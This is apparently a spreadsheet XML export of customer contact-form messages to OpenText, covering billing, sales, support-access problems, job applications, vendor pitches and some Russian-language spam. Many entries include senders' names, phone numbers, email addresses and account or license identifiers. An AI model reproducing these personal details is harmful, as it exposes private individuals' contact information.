Can you send us the September invoice for account WVDA036713 so that we can get payment over to you? Our email address for this one request is TComBills1.insight@engie.com. Please set this account up on paper billing if possible to keep this from happening further. I also want to make sure that the account is protected and to make sure that you have the correct billing address on file. If the billing address is incorrect, we would like it to be changed so that the bills will come to us from now on. _x000D_
 _x000D_
Billing Address: P.O. Box 2450_x000D_
Spokane, WA 99210_x000D_
 _x000D_
Thank you,_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">Hi Opentext,_x000D_
Are you able to connect at Dreamforce?  As a reminder, MarketSource is a division of Allegis Group the largest staffing firm with 300,000+ employees and 3RD Largest User of Salesforce on the planet._x000D_
_x000D_
Our sister company TEKsystems has a suite at Parc 55 just minutes of walking distance from Mosconi.  Assuming you’d like to take a break from the floor, here are some available times still left._x000D_
_x000D_
Wednesday, September 26_x000D_
9:30 a.m. – 12:00 p.m._x000D_
3:00 p.m. – 5:00 p.m._x000D_
_x000D_
Thursday, September 27_x000D_
7:00 a.m. – 11:30 a.m._x000D_
3:30 p.m. – 5:00 p.m._x000D_
_x000D_
Purpose of the quick meeting is to discuss a potential partnership.  Our inside and field sales teams drove more than $7B of revenue growth for companies like HP, IBM and AT&amp;T in 2017._x000D_
_x000D_
Our goal is to help you generate qualified leads, gain new customers and grow market share._x000D_
_x000D_
Please let us know which time works best for you._x000D_
_x000D_
Thanks,_x000D_
Jason_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">Looking for Auto Classification </t>
  </si>
  <si>
    <t>Interested in learning more about your tools to support end to end invoice processing automation, from capture through audit and posting</t>
  </si>
  <si>
    <t>Unable to log into my eFax account.  Fax number/Username is 2012560014.  I have done "Forgot Password," but have not received a password reset email.  Please advise.  Thank you!</t>
  </si>
  <si>
    <t>Putting together an RFP for WFO suite, need an OpenText contact.</t>
  </si>
  <si>
    <t>We make extensive use of eRoom Enterprise and our users are around the world. We are contemplating the upgrade to ver. 16.4. But before we go with that decision, we were wondering if, in OpenText's view, that we should instead migrate to one of your other products. The one thing we can't do without is eRoom's approval process database process. And we need the new application to be extremely simple as we have no professional IT support to help develop anything (the only IT support we have is to install/upgrade hardware, operating systems, and eRoom versions).</t>
  </si>
  <si>
    <t>We'd like to inquire about the forensic product EnCase and how it could be implemented in our organization.</t>
  </si>
  <si>
    <t>Dear Support,_x000D_
_x000D_
I cannot open a ticket with my OpenText profile._x000D_
_x000D_
Regards,_x000D_
_x000D_
Jose Maria Prieto</t>
  </si>
  <si>
    <t>JOB PURPOSE</t>
  </si>
  <si>
    <t>Berechtigung zum Erstellen von Support Anfragen bei OpenText für einen Kunden</t>
  </si>
  <si>
    <t>Having some issue with GM Team Center</t>
  </si>
  <si>
    <t xml:space="preserve">Need to implement rightfax for our SaaS and on-prem clients. This is an urgent request as we have a client going live in mid-October. </t>
  </si>
  <si>
    <t>One of our dongle numbers is G3002087654.  I am a forensic examiner who  recently started working at the USPS CISO in Morrisville, NC as a contractor for Raytheon.  I need a current set of EnCase manuals.  Thank you.</t>
  </si>
  <si>
    <t xml:space="preserve">Invoice 9000744157 does not have a PO listed. We can only pay with a PO. </t>
  </si>
  <si>
    <t xml:space="preserve">PBGC is doing market research on ECM vendors and OpenText is on the short list. Please have a sales account manager and solution architect to contact me as soon as possible. </t>
  </si>
  <si>
    <t xml:space="preserve">We are AppXtender (v16.3) users through Ellucian (Banner Document Managment) and I'd like to get access to the OpenText support site for questions that are exclusive to AppXtender.  I'd also like to get earlier access to patches and updates so we can evaluate them in parallel with Ellucian.  So far I have been able to register but I can't gain access to the support site.  We use one of the two instances of AX at Yale University, and we use it for Admissions, Financial Aid, Registration and Dining documents.  </t>
  </si>
  <si>
    <t>We are looking for a better fax mgt solution and would like a trial or demo to try out.</t>
  </si>
  <si>
    <t xml:space="preserve">Dear Colleagues,_x000D_
_x000D_
Instructus Skills recently took over the apprenticeship activities from Tech Partnership for England, Wales and Scotland in digital and Information Technology._x000D_
To ensure your voice is still heard in relation to skills training for digital and IT, Instructus are seeking to take on this role from Tech Partnership who are no longer in business. We can only do so if we can demonstrate that we represent the sector._x000D_
_x000D_
Your support by reply will be highly appreciated._x000D_
_x000D_
Kind regards,_x000D_
_x000D_
Larisa Puk_x000D_
</t>
  </si>
  <si>
    <t>report builder for Siemens QMS System inbuilt reports</t>
  </si>
  <si>
    <t>Remove me from mailing list</t>
  </si>
  <si>
    <t>Hi,_x000D_
I would like to get some information about "Exceed onDemand", especially about pricing. Can't find that much information on your web page._x000D_
We will have 1-2 servers and ~40 users.</t>
  </si>
  <si>
    <t>&gt;User account locked ???   We urgently need to send out an E-mailing to our customers !</t>
  </si>
  <si>
    <t xml:space="preserve">I have already sent a request for assistance.  I am unable to get to the support page as the system says that I need to re-activate my email address, but I never receive an email to confirm.  _x000D_
_x000D_
We use Povision 16.2 and when we try and open it we get the following error:  "The reconnection to the data sources failed.  the file could not be read.  Possible reasons are the file is in use or the user does not have sufficient rights to access it. Have you perhaps de-activated our account?  We are all experiencing the same issue. </t>
  </si>
  <si>
    <t>i am looking for job</t>
  </si>
  <si>
    <t>Archivierungsanforderungen für diverse Systeme</t>
  </si>
  <si>
    <t xml:space="preserve">Guten Tag, _x000D_
ich hatte bereits vor ein paar Wochen schon einmal angefragt bezüglich der Client Software "OpenText Content Server Office Editor". Ab welcher Version ist die Software kompatibel mit Windows 10? </t>
  </si>
  <si>
    <t>Greetings!_x000D_
_x000D_
I am writing to inquire whether your company is accepting applicants for an On-The-Job (OJT) training program. I have read about OpenText from the company website, and I believe it would be a good avenue for me to develop the skills needed in my chose field._x000D_
_x000D_
I am Antonio Enrico Roque, a third-year undergraduate student from De La Salle University-Manila. I am pursuing a degree in Bachelor of Science in Computer Science and as part of the practicum requirement, we are required to accomplish 320 hours of IT related works starting January 2019._x000D_
_x000D_
I have my resume ready upon your request. Thank you and I hope to be hearing from you soon!_x000D_
_x000D_
Antonio Enrico Roque_x000D_
0920 960 9855_x000D_
antonio_roque@dlsu.edu.ph</t>
  </si>
  <si>
    <t>Hi OpenText,_x000D_
_x000D_
Kindly confirm is it Authorized Reseller in Malaysia is Siaga Informatics?_x000D_
The renewal price we received from them is 25% higher than last year. Our customer cannot except with that. Kindly advise for the matters._x000D_
_x000D_
Hope you can reply me and cc kasseychee@brightnexus.com (Account Manager)._x000D_
_x000D_
Appreciate your prompt reply._x000D_
_x000D_
Thank you.</t>
  </si>
  <si>
    <t>I am applying for the position of IT Service Desk Analyst and would like to be scheduled for an interview.</t>
  </si>
  <si>
    <t>Please provide the quotation for Encase Mobile Phone extractor with detailed tax, shipping charges and updation fees if any to be shipped at Mumbai Maharashtra India.</t>
  </si>
  <si>
    <t>Let us know about the full quotation for TD3, taxes, shipping charges if any, updation fees if any  to be delivered in Mumbai Maharashtra India.</t>
  </si>
  <si>
    <t>Hi_x000D_
_x000D_
We are doing a high level review of document management systems and would like to understand what the licensing costs of this product would be?_x000D_
_x000D_
Thanks_x000D_
Nick</t>
  </si>
  <si>
    <t>nice to know 很高兴知道</t>
  </si>
  <si>
    <t>AP Automation</t>
  </si>
  <si>
    <t>Good morning,_x000D_
_x000D_
I am looking into extending our 2 FTK licences to 15/03/2019 in order to bring them in line with expiry dates of other software that we have. The licences are currently due to expire on 31/10/2018. I wondered if you could give me a quote?_x000D_
_x000D_
Thanks_x000D_
_x000D_
Jon</t>
  </si>
  <si>
    <t>Opentext Extended for Engineering Costs</t>
  </si>
  <si>
    <t>Hello_x000D_
_x000D_
My name is Bruno Camarero, I am writing from B2B department in Grupo Antolin in order to obtain a quotation from you as VAN service provider. EDI communications._x000D_
_x000D_
We would be very grateful if you would attend our request and send us a proper comtact in order to get the mentioned quotation._x000D_
_x000D_
Thank you very much in advance._x000D_
_x000D_
Kind regards.</t>
  </si>
  <si>
    <t xml:space="preserve">Training and certification </t>
  </si>
  <si>
    <t>Hi! I lost access to MySupport and can't get some downloads or create ticket. But 4 months ago i could. Please, help me to restore access. Check OTCS ticket 3746381</t>
  </si>
  <si>
    <t>can i have the email address for Malaysia Office?</t>
  </si>
  <si>
    <t>Purchase inquiry</t>
  </si>
  <si>
    <t>i am gay</t>
  </si>
  <si>
    <t>Unable to raise SR. Please assist to check why</t>
  </si>
  <si>
    <t>I am hosting Ai for Enterprise conference in Kuala Lumpur, Malaysia this coming 23-24 January 2019. I foresee your organization being a good fit as a speaker and sponsor for the event. Our delegates will be Caliber Decision Makers(80%) from the South East Asia and Asia Pacific regions. Let me know how we can be in touch about this matter.</t>
  </si>
  <si>
    <t xml:space="preserve">We are writing to inquire about the solution that might meet our needs._x000D_
_x000D_
Looking forward to discuss what Opentext can do for us in more detail, including _x000D_
1.)	company profile_x000D_
2.)	solution, functionality and services._x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
We are currently working on a large project in which we will have to send email, SMS, apple/android push notifications and voice calls to our customers. _x000D_
Can we get a demo of the product OpenText Notifications to see if it will fit our need? Also how is it priced?_x000D_
</t>
  </si>
  <si>
    <t>We do have case360 with us and wanted to check if we have a Outlook plugin for this one. functionality we are looking for is :- Emails can be related to Contacts, Leads, Accounts, Opportunities, Cases, and even custom objects. It also can synchronize Contacts, Events and Tasks between Outlook and Case 360, as well as directly create Cases from received emails.</t>
  </si>
  <si>
    <t>Pricing for hardware fax solution</t>
  </si>
  <si>
    <t>Are the OTPS virtual classroom - Asia Pacific and South Africa courses delivered in English or other languages? Thanks</t>
  </si>
  <si>
    <t>Would like to learn more about "OpenText Notifications"</t>
  </si>
  <si>
    <t>Need to be associated with our companies support contract, that way I will have access to the online support resources. Thanks, Ed</t>
  </si>
  <si>
    <t xml:space="preserve">Hi,_x000D_
_x000D_
We are looking to implement an OCR project with data capture integration (with ability to train system to recognize needed info) for our Vendor Invoices into our front end sales system ‘InforCRM’. Our operation is Cloud based._x000D_
We have more than 150 Vendors that we work with, but most of our volume of business is with approximately 25 Vendors. Their Invoices are unstructured and we would require your OCR system to recognize data. the below info on these Invoices:_x000D_
•	Model #_x000D_
•	Manufacturer_x000D_
•	Classification_x000D_
•	Quantity_x000D_
•	Price_x000D_
•	Ship to Address_x000D_
•	Number of Serial #’s (should match QTY)_x000D_
•	Sales Tax_x000D_
•	Freight_x000D_
_x000D_
Please advise if your system meets our requirements. If so, we would appreciate a conference call for a demonstration._x000D_
_x000D_
Thanks,_x000D_
</t>
  </si>
  <si>
    <t>I am going to be teaching a course 2612 on Computer Forensics and I am looking at your company and FTK to see what training I would need to teach a course using your software.  Also do you require any certifications to teach using your software?</t>
  </si>
  <si>
    <t>Good afternoon_x000D_
I am a consultant and I am currently in a consultancy with the company Equion Energy- Colombia, this company wants  do tests with opentext ETX on Linux platform with the application openworks 2D and 3D. We want to know if we count on you to perform these tests?</t>
  </si>
  <si>
    <t>We are missing the most recent invoice for account number 858125. We did not receive it in the mail</t>
  </si>
  <si>
    <t>I updated my email and no longer have access to the tickets I've created.  Or access to enter new tickets.</t>
  </si>
  <si>
    <t xml:space="preserve">I need to get access to my tickets. OTCS Ticket 3939933 </t>
  </si>
  <si>
    <t>Discuss as a possible solution.</t>
  </si>
  <si>
    <t>I am interested in learning how OpenText can help us store scanned proof of delivery paperwork in our ERP system and automatically attach each respective image to the appropriate delivery record so the proof of delivery image can be easily referenced later as needed.</t>
  </si>
  <si>
    <t>I will no longer be with this group and need to transfer ownership of the service and related fees to another advisor. Please let me know how I would accomplish that.</t>
  </si>
  <si>
    <t>We are a start up company.  We need a VAN to exchange EDI transactions with our trading partners.  Our sister company, R&amp;S Northeast, formerly Dixon-Shane, is currently using OpenText for this service.</t>
  </si>
  <si>
    <t>Request for information on EDI with CAT.</t>
  </si>
  <si>
    <t>Remove me from your contact list.</t>
  </si>
  <si>
    <t>Upgrade iSeries from Power 8 to Power 9. We would like to know if the product Tli version 6.4.1 will run properly on a Power 9</t>
  </si>
  <si>
    <t>Existing Customer needs a current vendor due diligence/Information security packet.</t>
  </si>
  <si>
    <t>Looking to set up fax2mail for our company.</t>
  </si>
  <si>
    <t xml:space="preserve">I'd like to learn more about EnCase Endpoint Security 6. _x000D_
Thank you,_x000D_
-John_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">Vendor production evaluation for PBGC. </t>
  </si>
  <si>
    <t xml:space="preserve">I have a customer in Federal Space that would like to learn more about the options they have to manage their customer communication. Please get back to me at your earliest so we can get the NDA in place and discuss potential solutions. _x000D_
_x000D_
Thank you, Snigdha </t>
  </si>
  <si>
    <t>I would like to status my license server.  I don't have documentation on maintaining Brava</t>
  </si>
  <si>
    <t xml:space="preserve">I am trying to speak with someone about a opportunity for a new order of 50 SSH version 15 licenses for Host Explorer.  Can you please contact me so we can move forward for a State Agency within the State of Mississippi. </t>
  </si>
  <si>
    <t>Want to explore options for upgrade and renewing current hardware and software.</t>
  </si>
  <si>
    <t>Need to know the end of life for various Documentum components</t>
  </si>
  <si>
    <t>Can you direct me to someone in relation to easylink EDI system/ software. my mailbox details are kyoshin01 this is regards to Nissan edit imports for Nitto Denko UK. I use to detail with Bob Mosley on support</t>
  </si>
  <si>
    <t>Want to get pricing for basic Exceed product. Only looking for an X server and not a lot of bells and whistles. This would be for Windows 10 platform. We would need 4 seats. Does Exceed integrate with SSH clients like PuTTY and OpenSSH, or does it have its own SSH client for X11 tunneling? Please respond via email if possible so that I have a copy of the necessary information to show my manager. Thanks.</t>
  </si>
  <si>
    <t>my password is not working</t>
  </si>
  <si>
    <t>Technology partnership</t>
  </si>
  <si>
    <t xml:space="preserve">We are contacting you in regards to invoice/Billing Doc # 9000745070. We were not charged tax on purchasing the TeleForm Reader Module (1000025113 or EN801966). We want to confirm that we are not marked as a Tax-Exempt and as well as this product is taxable (meaning is not a service or SAAS)? We would really appreciate your immediate response, thank you!_x000D_
_x000D_
_x000D_
Sincerely,_x000D_
_x000D_
Muhammad Aftab_x000D_
</t>
  </si>
  <si>
    <t>Dear support._x000D_
_x000D_
We cannot access to mysupport portal. We can access to Open Text profile but we can't open a ticket. Account used: jmprietop@alter.es_x000D_
_x000D_
Regards._x000D_
_x000D_
_x000D_
Jose Urbano</t>
  </si>
  <si>
    <t>Guten Tag, wir interessieren uns für Ihre Lösung "OpenText Extended ECM for SAP SuccessFactors" und möchte diese gerne kennenlernen. Bitte nehmen Sie zur weiteren Abstimmung Kontakt mit mir auf. Vielen Dank! _x000D_
_x000D_
Viele Grüße_x000D_
Simone Richter</t>
  </si>
  <si>
    <t>Hello,_x000D_
Me and my husband have made a job application to your company. If possible we want to learn our application was rejected or in evaluation phase. Our names are Kubra Ozcan and  Gokhan Ozcan._x000D_
_x000D_
Regards,_x000D_
Kubra Ozcan</t>
  </si>
  <si>
    <t>I am enrolled in the VIM bootcamp to begin September 24.  I'm enrolled under email connie.r.christiansen@l3t.com.  I am on vacation and don't have access to my email.  I haven't received the training material yet.  Is the class still a go and when should I expect the materials?  Thanks.  Connie</t>
  </si>
  <si>
    <t>Hello, Can I get your HR email id?(Hyderabad office)_x000D_
Are there any opportunities for an internship in Hyderabad?</t>
  </si>
  <si>
    <t>Neue Fax-Lösung für Standort Neu-Isenburg</t>
  </si>
  <si>
    <t xml:space="preserve"> Sehr geehrte Damen und Herren, _x000D_
_x000D_
ich habe mich am 19.07.2018 auf die in Ihrem Hause vakante Position als Senior Program Manager für Strategic Initiatives beworben. Bisher habe ich keinerlei Rückmeldung zu dieser Bewerbung erhalten und wollte mich daher erkundigen, ob der Auswahlprozess bereits abgeschlossen ist bzw. wie der Status zu meiner Bewerbung ist._x000D_
_x000D_
Danke vielmals für Ihre Rückmeldung. _x000D_
_x000D_
Herzliche Grüße_x000D_
Markus Loferer</t>
  </si>
  <si>
    <t xml:space="preserve">Please can someone let me know if there are any physical attendance for courses in the UK or Europe for the IR280 - EnCase® Endpoint Security Training for either this year or next year? </t>
  </si>
  <si>
    <t xml:space="preserve">Dear Marketing Manager,_x000D_
_x000D_
I would like to send an advertising media kit for _x000D_
Consulting magazine to the correct person at your _x000D_
company, but I am not sure who that might be?  _x000D_
_x000D_
Our digital title reaches C-Level Consultants at Firms in the _x000D_
US and Canada.  They are in all types of consulting fields_x000D_
such as IT, HR, Financial, Operations and Strategy.  _x000D_
</t>
  </si>
  <si>
    <t>Hello,_x000D_
Are you familiar with TheServiceProgram? They have a full package that includes route optimization._x000D_
Why shouldn't you offer the same?_x000D_
_x000D_
I'd love to give you a free month of our service to let you try it yourself._x000D_
If you're interested in more details, please email back._x000D_
_x000D_
Thanks for your time,_x000D_
Inbal Axelrod,   CMO</t>
  </si>
  <si>
    <t>Hi Team,_x000D_
_x000D_
I am unable to access the My support/my product URLs and it seems like some issue with my account. I keeping the error page that says "Our records indicate that you have registered for access to My Support but have not yet confirmed your email with us.". I have tried clicking on the send confirmation, but i never get a confirmation link. Could you help me with this? I am unable to access any of my products/my support portal_x000D_
_x000D_
thanks_x000D_
Santhosh</t>
  </si>
  <si>
    <t>Request for pricing (Encase kit / Guidance Software / including Training)_x000D_
Please contact me._x000D_
_x000D_
Thank you._x000D_
Reghardt Joubert_x000D_
BCX Namibia_x000D_
+264811221146</t>
  </si>
  <si>
    <t>Is "E-room" a solution provided by your company? Thank you.</t>
  </si>
  <si>
    <t>Hi _x000D_
We  need to verify your UK banking details over the phone ASAP in order for us to be able to raise a purchase order to purchase  software-our contact at the university is Heidi Robinson)_x000D_
_x000D_
Please can somebody contact myself regarding this matter asap._x000D_
_x000D_
Many thanks_x000D_
_x000D_
Janette Tomkins</t>
  </si>
  <si>
    <t>We are looking for a faxing solution to integrate with our software. We have medical software and want our users to be able to fax a prescription to a pharmacy. We do not want to send via email. Please communicate with me via email only for now. Thank you.</t>
  </si>
  <si>
    <t>Renewal.</t>
  </si>
  <si>
    <t xml:space="preserve">Sehr geehrte Damen und Herren, _x000D_
_x000D_
wir interessieren uns für weitere Informationen zu ihrer "OPENTTEXT SUITE FOR SAP" (SAP Extended ECM by Opentext). _x000D_
Hier speziell würden wir gerne erfahren, welche Möglichkeiten Opentext anbietet, um z.B._x000D_
# Dokumente aus SAP heraus zu verwalten (erfassen, ändern, suchen)._x000D_
# Dokumente aus einem documentum - System heraus zu verwalten (erfassen, ändern, suchen)_x000D_
_x000D_
Aktuell betreuen wir einen Kunden in einer Vor-Projektphase und suchen nach einer Standard-Lösung. _x000D_
_x000D_
Wir freuen uns auf ein Feedback von Ihnen._x000D_
_x000D_
Mit freundlichen Grüßen_x000D_
_x000D_
Frank Jordan_x000D_
</t>
  </si>
  <si>
    <t>I have a license for Gupta Report Builder 6.3 but from the link provided in the license I have no chance to download the product. Only resource available is the blog._x000D_
I already open ticket 3962495 where you can confirm I have the license._x000D_
Please help me. Thanks</t>
  </si>
  <si>
    <t>Would like a price for installation of a documentum system as safe repository for Non-Clinical and clinical data</t>
  </si>
  <si>
    <t>To work and implement Open Text application</t>
  </si>
  <si>
    <t>I need an email address for your finance office so I can verify your payment details for bacs payments</t>
  </si>
  <si>
    <t>We would like to introduce document control software during construction supervision. We will be using for_x000D_
_x000D_
1. construction supervision as the Engineer_x000D_
2. We will manage around 4000 drawings, test results, letters, material data, with multiple revisions etc.  _x000D_
3. Estimate number of documents: 10 documents per day._x000D_
4. Number of users: 30 _x000D_
5. We need to be able to search, read and print these documents._x000D_
6. Duration of project 7 years._x000D_
_x000D_
We would like to know _x000D_
1. What is the recommended software or package_x000D_
2. estimate cost for 30 users per year or per project period_x000D_
3. What kind of service is available.  for example, can we install the software by ourselves, etc?</t>
  </si>
  <si>
    <t xml:space="preserve">I'm looking for a partner to deploy on several plants the VIM solution for SAP we've implemented in one of our sites </t>
  </si>
  <si>
    <t>I am trying to log a support call but when I go to the support area the system says that I need to verify my email address.  When I select to trigger the verification email, I never get the verification email in my inbox (I have tried this multiple times already).  Please urgently advise how this can be resolved as we are unable to use Provision at the moment. Thanks!</t>
  </si>
  <si>
    <t xml:space="preserve">Hello!_x000D_
_x000D_
Greetings from us OneBlue._x000D_
_x000D_
We are a Marketing Agency, Consulting Firm and a publisher as well. We specializes in B2B/B2C Lead Generation and Appointment setting services, we provide qualified leads to our client based on their Objectives, Target Markets and Specifications through via Digital and Telemarketing approach._x000D_
_x000D_
Looking forward to sharing some insights on how we can help in providing Qualified Leads or do some projects together._x000D_
_x000D_
Best,  _x000D_
</t>
  </si>
  <si>
    <t>Environmental concern</t>
  </si>
  <si>
    <t>Hello. We are looking to license documentum/opentext as a integrated solution for a client at Netherlands. The client is looking to digitalize his entire financial KYC process and it involves a lot of workflows / document scanning / capture / OCR etc which we think will be a good fit with OpenText. We are legacy users of documentum and we are fully aware of its capabilities. We reached out to Nitish Kapur from your India office but we received little help. We would like your help to expedite this process and we are required to submit a proposal for OpenText integrated solution in the next couple of days. Please contact me asap. The client is expecting to make a decision by the 28th of September._x000D_
If I am unavailable , please reach out to my head of Technology , Anand Kailash in India on +91 9902922555. Thanks in advance for your help</t>
  </si>
  <si>
    <t>I sent my application but resumé google sign in was disabled? I just wanted to touch base that I've always wanted to work as a designer, and my really good friend David Sceviour works for you, and always speaks highly of the company, and would be great to build there!</t>
  </si>
  <si>
    <t>ARS Digital Forensics, www.arsdigitalforensics wishes to apply to be Opentext reseller of Digital Forensics Software and ICT Security Management products in Africa, India and China, wherein, it has established markets._x000D_
_x000D_
Kindly advise you reseller agreement requierements._x000D_
_x000D_
thank you</t>
  </si>
  <si>
    <t xml:space="preserve">Please quote my requirement </t>
  </si>
  <si>
    <t xml:space="preserve">My Organization request is to have a solution function most likely as Dropbox or GDrive the _x000D_
we can discuss more details later _x000D_
the most important  deference is  the system must be totally  on premises ._x000D_
This mean the all system components as web servers and storage for files must  be reside and implemented on IPA Data center _x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">Hi,_x000D_
We have been using the right fax product, which was sold to us through a third party called 4dit in kuwait. but recently we came to know the 4dit is closed down. we would like to get the direct support on the product from opentext. Please suggest us on how to go ahead about this._x000D_
_x000D_
Thanks.. </t>
  </si>
  <si>
    <t>Доброе время суток !!! молодые мамы вам будет интересно узнать о - Это исключает возможность фабричного брака.</t>
  </si>
  <si>
    <t>I have discovered a security vulnerability on the login page of Covisnit for Ford Motors. I would like to know where to send a detailed report for reproducing this vulnerability. _x000D_
_x000D_
Thanks.</t>
  </si>
  <si>
    <t>I need to know if openText has capability to search by Arabic characters in images which have Arabic Optical characters. i.e. OCR using Arabic characters. One of our customers need to have search by Arabic/English characters within stored images and drawings stored in SAP content server.</t>
  </si>
  <si>
    <t>Saber el costo de la plataforma</t>
  </si>
  <si>
    <t>Hello Team,_x000D_
_x000D_
While filling the "Become EnScript Developer" Form, I am facing the issue! I dont see an option for country but at the time of form submission  it was giving warning for country name is compulsory. Please help me for the same._x000D_
_x000D_
Thanks in advance..!_x000D_
_x000D_
Regards,_x000D_
Dnyandev Najan_x000D_
8007433944</t>
  </si>
  <si>
    <t>Мое почтение ... все о качалках вы можете узнать здесь - Интернет магазин детских товаров КиддиБум.</t>
  </si>
  <si>
    <t>ML</t>
  </si>
  <si>
    <t>Доброе время суток !!! Нашел для Вас интересную подборку информации - Так что выбрать есть из чего.</t>
  </si>
  <si>
    <t>For the loan amount to be paid to me and put in my bank account.</t>
  </si>
  <si>
    <t>Dear Ladies and Gentlemen,_x000D_
_x000D_
I am writing you regarding Job Offer from OpenText_x000D_
as an Project Manager - Managing Consultant offered through Linkedin._x000D_
Location / Standort des Unternehmens: Frankfurt am Main, DE _x000D_
_x000D_
Best regards_x000D_
Dimitrij Oster</t>
  </si>
  <si>
    <t>Dear,_x000D_
the reason that i am contacting your organization on behalf of my factory is we want see the option that you can provide for us in the process of expanding our organization along with our products and how we can transform the factory using iot devices inti 21 century manufacturing era feel free to contact me._x000D_
_x000D_
with regards_x000D_
Controller and Planner_x000D_
Alazar Negassi</t>
  </si>
  <si>
    <t>Мое почтение ! молодые мамы вам будет интересно узнать о : Здесь речь идет обо всех тонкостях внешнего вида и использования мебели.</t>
  </si>
  <si>
    <t>Привет !!! Нашел для Вас интересную инфу : Тканевый чехол снимается, можно стирать.</t>
  </si>
  <si>
    <t xml:space="preserve">Hello,_x000D_
_x000D_
I am interested in knowing more about the encase mobile investigator. My question is what image types, device types, and the number of applications supported by this tool._x000D_
_x000D_
Regards_x000D_
Fahad Alzaabi_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Здравствуйте ! Нашел для Вас интересную инфу : Если не знаете, какую модель качелей выбрать - звоните нам.</t>
  </si>
  <si>
    <t xml:space="preserve">Need a temporary license for Kofax server. I already requested a temporary license from Kofax and was requested to go through Opentext for 60 days, to transition to a new server. Kofax serial number is WF51212. I was told that you'll can get a quick turnaround, since I turned in a ticket three days ago. </t>
  </si>
  <si>
    <t>Love AUE</t>
  </si>
  <si>
    <t>We are interested in setting up a fax line for our office.</t>
  </si>
  <si>
    <t>Hi There,_x000D_
_x000D_
I just to know different about encase forensic(blue dongle) and Encase Forensic portable(silver dongle)._x000D_
Please let me know the use of encase forensic portable(silver dongle).what we can do with encase forensic silver dongle. It's urgent._x000D_
Thanks in advance..!_x000D_
_x000D_
Regards,_x000D_
Rushit</t>
  </si>
  <si>
    <t>We're evaluating solutions for Document scanning &amp; imaging.  We would like to have a demo of your solution for it.</t>
  </si>
  <si>
    <t>We are looking D2 and AppExtender for webtop replacement . Could you please provide right point of contact for the same.</t>
  </si>
  <si>
    <t xml:space="preserve">Our admin account for EasyLink Fax Administration is either locked out or needs the password reset. </t>
  </si>
  <si>
    <t>Приветствую ! молодые мамы вам будет интересно узнать о - Выбирайте среди большого разнообразия звуков природы, колыбельных и забавных мелодий.</t>
  </si>
  <si>
    <t>I require information about the commercial offer for the Fax2Mail service in Costa Rica. _x000D_
How much does the monthly subscription cost ?, how much does each fax page transacted cost? , what number in the PSTN should the customer dial? if we already have a PBX (Avaya IP OFFICE) as it is integrated into the service?</t>
  </si>
  <si>
    <t>Need an Exceed Urgent Quotation for a importan financial customer here in México City. I´m a System Integrator and I don´t have a response by email and either by telephone. Maybe you have a Distributor or dealer here in México and I can contact them.</t>
  </si>
  <si>
    <t>I am trying to reset my Open text login for the Catalog and when i do i get a green "you password has been sent" i never get the email with the password reset... how do i change and get access to my account?</t>
  </si>
  <si>
    <t>Привет !!! молодым родителям будет интересно узнать - При современном ритме жизни молодым родителям просто не обойтись без таких помощников, как детские кресла-качалки и шезлонги.</t>
  </si>
  <si>
    <t>Приветствую : молодые мамы вам будет интересно узнать о : Модели с кованным из металла каркасом и плетеные кресла-качалки чаще всего используют для отдыха на открытых площадях.</t>
  </si>
  <si>
    <t>Need to talk to someone in sales regarding current contract with sister company Sea Star Line LLC and the possibility to expanding the agreement to other divisions.  Please contact me.</t>
  </si>
  <si>
    <t xml:space="preserve">Don't have access to knowledge base. </t>
  </si>
  <si>
    <t>Received two invoices for September - one with Easylink logo and one with OpenText logo.  Both had the same invoice number and remittance address.  Please only send one invoice each month with the OpenText logo - we are aware of the rebranding at this point.  Thank you.</t>
  </si>
  <si>
    <t>Hello. Our fax server has been running out of space and I have found that the btcall.log file has reached a size of 184 GB. Can you tell me how I can shrink this file? Thank you.</t>
  </si>
  <si>
    <t>Need information on how Documentum stores PDF files. Can we determine if a PDF seal has been tampered with on a document stored in Documentum.</t>
  </si>
  <si>
    <t>Hey Folks,_x000D_
_x000D_
OpenText has a business profile on Capterra, one of Gartner's business software reviews and lead generation websites. _x000D_
_x000D_
There's currently no active point of contact managing the content, images, or reviews. _x000D_
_x000D_
Let us know where we should send the login credentials so you can take over the profile. _x000D_
_x000D_
All the best, _x000D_
Don Georgette</t>
  </si>
  <si>
    <t>New contact information, account and software update needed.</t>
  </si>
  <si>
    <t>Iam looking for a job in Software Engineer profile.Plz accept me to work in ur company.</t>
  </si>
  <si>
    <t>Hi,_x000D_
_x000D_
I'm trying to create a developer account but the registration service returns an error:_x000D_
_x000D_
POST /registrationservice/v1/accountrequests 404 (Not Found)._x000D_
_x000D_
Can this be fixed or can you create an account for me?_x000D_
_x000D_
Thanks!</t>
  </si>
  <si>
    <t>Asking for support to download the license of product purchased against order number 690871 (PO#Otek-PO-335-12614) and against license number X100008031325</t>
  </si>
  <si>
    <t>We have Open Text OCR- Dokustar License - however we need urgent support on refilling the pages of OCR license.</t>
  </si>
  <si>
    <t>I am currently exploring vendors for an Interaction Analytics solution to deliver on some high level requirements, and would like a demo and approx price for budgeting purposes.  Please contact me by email to arrange an intro call and set up a demo - my mobile is often turned off when i am in the contact centre so email is best please.</t>
  </si>
  <si>
    <t>Require costing/price on iHUB</t>
  </si>
  <si>
    <t>I would like to investigate with you into a project where we would like to automatically read material specifications and export properties mentioned in a text document into searchable attributes or tags. Please contact me to setup a meeting to clarify some details and how we could proceed in that project.</t>
  </si>
  <si>
    <t xml:space="preserve">Hello, do you have costumer portal where can I check for license expiration and download updates for my encase?_x000D_
Thanks </t>
  </si>
  <si>
    <t>Additional line for Fax2Mail service</t>
  </si>
  <si>
    <t xml:space="preserve">I'm looking for HR job, having 10 years Experience.. </t>
  </si>
  <si>
    <t>Given that I would like to pursue the training related to Gupta Sql - Web-based GUPTA onDemand course, I wouldlike to know the price involved and regarding pre-requisites - the site mentions that there is a need to have a valid license for OpenText Gupta Team Developer. So what would be the cost incurred in total.</t>
  </si>
  <si>
    <t xml:space="preserve">Hello,_x000D_
_x000D_
Hope you are doing well._x000D_
_x000D_
I came across your website today when searching for  "drone service” and noticed that you don't show in the maps section and are #8 in the organic listings._x000D_
_x000D_
That means you're missing out a lot of calls._x000D_
_x000D_
We can help your website to get on the first page of Search Engines (Google, Yahoo, Bing and etc.) to get all missing calls and increase the organic traffic and unique users over your competitors._x000D_
_x000D_
